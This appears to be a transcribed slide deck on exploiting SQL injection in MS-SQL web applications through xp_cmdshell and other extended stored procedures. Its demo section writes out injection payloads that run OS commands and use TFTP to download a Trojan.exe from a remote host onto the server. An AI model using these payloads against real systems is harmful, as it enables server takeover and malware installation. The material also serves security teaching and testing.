Date post: | 06-Jul-2015 |
Category: |
Documents |
Upload: | varunduggal457 |
View: | 1,216 times |
Download: | 3 times |
Advanced Exploitation
using SQL Injection
By Varun Duggal
Work in Application Security Domain
SQL Injection The ability to inject SQL commands into the database engine through an
existing application
SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query
Attackers trick the interpreter into executing unintended commands via supplying specially crafted data
Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application
Vulnerable Applications Almost all SQL databases and programming languages are potentially
vulnerable
MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc
Accessed through applications developed using:
Perl and CGI scripts that access databases
ASP, JSP, PHP
XML, XSL and XSQL
Javascript
VB, MFC, and other ODBC-based tools and APIs
DB specific Web-based applications and API‟s
Reports and DB Applications
3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
many more
Stored procedure
A stored procedure is a subroutine available to applications accessing a relational database system
Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary
Exploiting the Vulnerability
xp_cmdshell stored procedure, which is built into MS-SQL by Default
Allows users to execute operating system commands
Tasks
Executing any type OS commands
Ping Server
Directory Listing
Create File
Defacing Website
Execute Applications
Upload and Download files
More Stored Procedures (xp_cmdshell)
(xp_regread)
(xp_servicecontrol)
(xp_availablemedia)
(xp_enumdsn)
(xp_loginconfig)
(xp_makecab)
(xp_ntsec_enumdomains)
(xp_terminate_process)
Demo
Test Bench
O. S : Windows XP Professional
Frontend: ASP
Backend: MSSQL 2000
Web Server: IIS 5.0
Checking Vulnerable or Not Enter a single quote in the id parameter the error message indicates
it‟s vulnerable to SQL Injection.
Now open the URL and run the command
„;exec master..xp_cmdshell “ ipconfig > c:\inetpub\wwwroot\test.txt”--
Now finally file created on the web server access that file as shown in the below snapshot:
Upload a file on the server
Open tftp server containing malicious code to be uploaded
Now open the URL and run the command
„;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe C:\Trojan.exe”--
Logs of Tftp shows file gets uploaded on the server